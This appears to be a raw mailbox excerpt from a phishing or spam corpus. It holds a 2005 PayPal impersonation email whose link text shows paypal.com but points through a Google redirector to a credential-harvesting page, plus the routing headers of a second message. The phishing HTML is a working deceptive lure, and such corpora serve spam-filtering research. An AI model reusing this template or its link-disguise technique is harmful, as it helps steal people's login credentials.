From: PayPal <confirm@intl.paypal.com>
Content-Type: text/html
X-Spam-Checker-Version: SpamAssassin 3.0.2 (2004-11-16)
X-Spam-Level: **
X-Spam-Status: No, score=2.3 required=5.0 tests=HTML_IMAGE_ONLY_20,
	HTML_MESSAGE,MIME_HEADER_CTYPE_ONLY,MIME_HTML_ONLY,
	RAZOR2_CF_RANGE_51_100,RAZOR2_CHECK,URI_REDIRECTOR autolearn=no 
	version=3.0.2
X-Spam-Report: 
	*  0.0 URI_REDIRECTOR Message has HTTP redirector URI
	*  0.4 HTML_IMAGE_ONLY_20 BODY: HTML: images with 1600-2000 bytes of words
	*  0.0 HTML_MESSAGE BODY: HTML included in message
	*  0.1 RAZOR2_CF_RANGE_51_100 BODY: Razor2 gives confidence level above 50%
	*      [cf: 100]
	*  0.2 MIME_HTML_ONLY BODY: Message only has text/html MIME parts
	*  1.5 RAZOR2_CHECK Listed in Razor2 (http://razor.sf.net/)
	*  0.1 MIME_HEADER_CTYPE_ONLY 'Content-Type' found without required MIME headers
Status: O
X-Status: 
X-Keywords:                  
X-UID: 160


<html>
<body><br>
<table width="75%" border="0">
  <tr>
    <td><p><img src="https://www.paypalobjects.com/en_US/i/logo/paypal_logo.gif"></p>
      <p><font face="Verdana, Arial, Helvetica, sans-serif"><br>
        </font> </p>
      <p style="margin-top: -15"><font size="2" face="Courier New, Courier, mono">You 
        have added hackmail25@aol.com as a new email address for your 
        <br>
        PayPal account. </font></p>
      <font size="2" face="Courier New, Courier, mono">If you did not authorize 
      this change or if you need assistance with<br>
      your account, please contact PayPal customer service at: </font><font size="1" face="Courier New, Courier, mono"><font face="Courier New, Courier, mono"> 
      <p><font size="2"><a href=" http://www.google.com/url?sa=U&start=4&q=http://dns1.n-kiso.co.jp/.checking/.www.paypal.com/index.php">https://www.paypal.com/cgi-bin/webscr?cmd=_login-run</a></font></p>
      </font></font> 
<p><font size="2" face="Courier New, Courier, mono">PayPal Customer Service</font></p>
      <p><font size="2" face="Courier New, Courier, mono">Please do not reply to this e-mail 
        as this is only a notification.<br>
        Mail sent to this address cannot be answered.</font></p>
      <p><font size="2" face="Courier New, Courier, mono">Copyright 2005, <a href=" http://www.google.com/url?sa=U&start=4&q=http://dns1.n-kiso.co.jp/.checking/.www.paypal.com/primapagina.php">www.paypal.com</a>, 
        All Rights Reserved.</font><br>
      </p>
      <p><img border="0" src="https://seal.verisign.com/images/logo2.gif"></img></a></p>
      <p></p></td>
  </tr>
</table>
<p style="margin-top: -15">&nbsp;</p>
</body>
</html>

From account@cuna.org  Tue Dec 20 09:27:21 2005
Return-Path: <account@cuna.org>
X-Original-To: nobody@login.example.com
Delivered-To: nobody@login.example.com
Received: from mail2.example.com (mail2.example.com [10.3.4.5])
	by naughty.example.com (Postfix) with ESMTP id B6A0353701F
	for <nobody@login.example.com>; Tue, 20 Dec 2005 09:27:20 -0500 (EST)
Received: from mail2.example.com (localhost.example.com [127.0.0.1])
	by mail2.example.com (Postfix) with ESMTP id A17E76FA380
	for <nobody@example.com>; Tue, 20 Dec 2005 09:27:17 -0500 (EST)
Received: from lujan.example.com (foo.example.com [10.2.3.4])
	by mail2.example.com (Postfix) with ESMTP
	for <nobody@example.com>; Tue, 20 Dec 2005 09:27:17 -0500 (EST)
Received: by lujan.example.com (Postfix)
	id 56C801BC4F; Tue, 20 Dec 2005 15:27:08 +0100 (CET)
Delivered-To: foobee@example.com
Received: from localhost (unknown [127.0.0.1])
	by lujan.example.com (Postfix) with ESMTP id CA2B01BB1E
	for <foobee@example.com>; Tue, 20 Dec 2005 14:27:07 +0000 (UTC)
Received: from lujan.example.com ([10.2.3.4])
	by localhost (lujan [10.2.3.4]) (amavisd-new, port 10024)
	with ESMTP id 06966-03 for <foobee@example.com>;
	Tue, 20 Dec 2005 15:26:48 +0100 (CET)
Received: from 216.117.143.98 (unknown [216.117.143.98])
	by lujan.example.com (Postfix) with SMTP id 694FE1BB3E
	for <foobee@example.com>; Tue, 20 Dec 2005 15:26:43 +0100 (CET)
Received: from 32.52.46.249 by ; Tue, 20 Dec 2005 07:21:11 -0700
Message-ID: <XOMQBEYJOAPCEEENIJNIYHM@aol.com>
